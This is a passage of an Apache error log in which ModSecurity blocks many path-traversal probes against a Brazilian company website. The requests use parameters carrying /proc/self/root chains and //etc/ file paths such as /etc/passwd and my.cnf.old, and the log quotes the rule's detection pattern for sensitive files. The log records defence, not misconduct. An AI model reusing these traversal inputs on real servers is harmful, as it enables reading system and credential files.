[Fri Mar 20 09:24:10.231316 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.241.31:55070] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08auoXxyEfFpUF8f-R3wAAAUM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:24:11.093296 2026] [:error] [pid 7893:tid 140411658000128] [client 216.73.216.191:45582] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08axCii7xarUs8iHZ5CwAAAgo"]
[Fri Mar 20 09:24:11.103602 2026] [:error] [pid 21219:tid 140411582465792] [client 216.73.216.191:45586] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/e2fsck.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08a_XLqtnMIWvjpaKrWAAAApM"]
[Fri Mar 20 09:24:11.739865 2026] [:error] [pid 7235:tid 140411699963648] [client 216.73.216.191:45626] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/login.defs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08a_qxLDW4GITHUkT66wAAAQU"]
[Fri Mar 20 09:24:12.486964 2026] [:error] [pid 21219:tid 140411716749056] [client 216.73.216.191:45692] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tenable_tag"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08bPXLqtnMIWvjpaKrWwAAAoM"]
[Fri Mar 20 09:24:13.398952 2026] [:error] [pid 31215:tid 140411616036608] [client 74.7.241.31:55072] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08bQF0L0L-SsrnPo55hwAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:24:14.040103 2026] [:error] [pid 31215:tid 140411708356352] [client 216.73.216.191:45816] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab08bgF0L0L-SsrnPo55iAAAAsQ"]
[Fri Mar 20 09:24:16.435205 2026] [:error] [pid 10189:tid 140411624429312] [client 74.7.241.31:55084] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08cDJ3M9BSuKP7CAYv_gAAAI4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:24:17.962486 2026] [:error] [pid 31215:tid 140411582465792] [client 216.73.216.191:46040] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyslog.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08cQF0L0L-SsrnPo55jAAAAtM"]
[Fri Mar 20 09:24:19.502993 2026] [:error] [pid 21219:tid 140411708356352] [client 216.73.216.191:46172] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08c_XLqtnMIWvjpaKrYwAAAoQ"]
[Fri Mar 20 09:24:19.606992 2026] [:error] [pid 7235:tid 140411565680384] [client 74.7.241.31:59746] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08c_qxLDW4GITHUkT67wAAARU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:24:23.307053 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:37592] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08deoXxyEfFpUF8f-SCwAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:24:23.322755 2026] [:error] [pid 11167:tid 140411691570944] [client 74.7.241.31:59758] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08dvHIg5MgXLBnicMIPQAAAcY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:24:25.827318 2026] [:error] [pid 7893:tid 140411658000128] [client 74.7.241.31:59772] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08eRCii7xarUs8iHZ5JQAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:24:26.840158 2026] [:error] [pid 7235:tid 140411548894976] [client 216.73.216.191:46540] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases.db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08evqxLDW4GITHUkT6-QAAARc"]
[Fri Mar 20 09:24:27.515074 2026] [:error] [pid 15826:tid 140411699963648] [client 216.73.216.191:46640] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dovecot.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08e-oXxyEfFpUF8f-SFAAAAUU"]
[Fri Mar 20 09:24:28.779531 2026] [:error] [pid 9818:tid 140411716749056] [client 216.73.216.191:46746] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08fF1pVZ5mVmJwsFNCgwAAAEM"]
[Fri Mar 20 09:24:29.168201 2026] [:error] [pid 31215:tid 140411683178240] [client 216.73.216.191:46782] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/wgetrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08fQF0L0L-SsrnPo55nQAAAsc"]
[Fri Mar 20 09:24:30.831181 2026] [:error] [pid 7893:tid 140411741927168] [client 216.73.216.191:46918] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/inittab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08fhCii7xarUs8iHZ5KgAAAgA"]
[Fri Mar 20 09:24:30.954519 2026] [:error] [pid 7893:tid 140411565680384] [client 216.73.216.191:46928] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/resolv.conf.save"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08fhCii7xarUs8iHZ5LAAAAhU"]
[Fri Mar 20 09:24:31.339416 2026] [:error] [pid 11642:tid 140411725141760] [client 216.73.216.191:46964] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ntp.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08f7ninkcc-iUj5ApviAAAA4I"]
[Fri Mar 20 09:24:31.723025 2026] [:error] [pid 26799:tid 140411725141760] [client 216.73.216.191:46996] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08f9a6ubjKNq_cu4bo4AAAA0I"]
[Fri Mar 20 09:24:32.167661 2026] [:error] [pid 11642:tid 140411699963648] [client 74.7.243.128:44518] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08gLninkcc-iUj5ApvigAAA4U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:24:32.234131 2026] [mime_magic:error] [pid 9818:tid 140411666392832] (70014)End of file found: [client 216.73.216.191:47058] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:24:33.147108 2026] [:error] [pid 10189:tid 140411590858496] [client 216.73.216.191:47130] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dracut.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08gTJ3M9BSuKP7CAYwIwAAAJI"]
[Fri Mar 20 09:24:34.250009 2026] [mime_magic:error] [pid 7235:tid 140411699963648] (70014)End of file found: [client 216.73.216.191:47220] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:24:36.423015 2026] [:error] [pid 7893:tid 140411632822016] [client 216.73.216.191:47382] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/favicon.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab08hBCii7xarUs8iHZ5NQAAAg0"]
[Fri Mar 20 09:24:37.091233 2026] [:error] [pid 10189:tid 140411616036608] [client 74.7.243.128:55864] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag 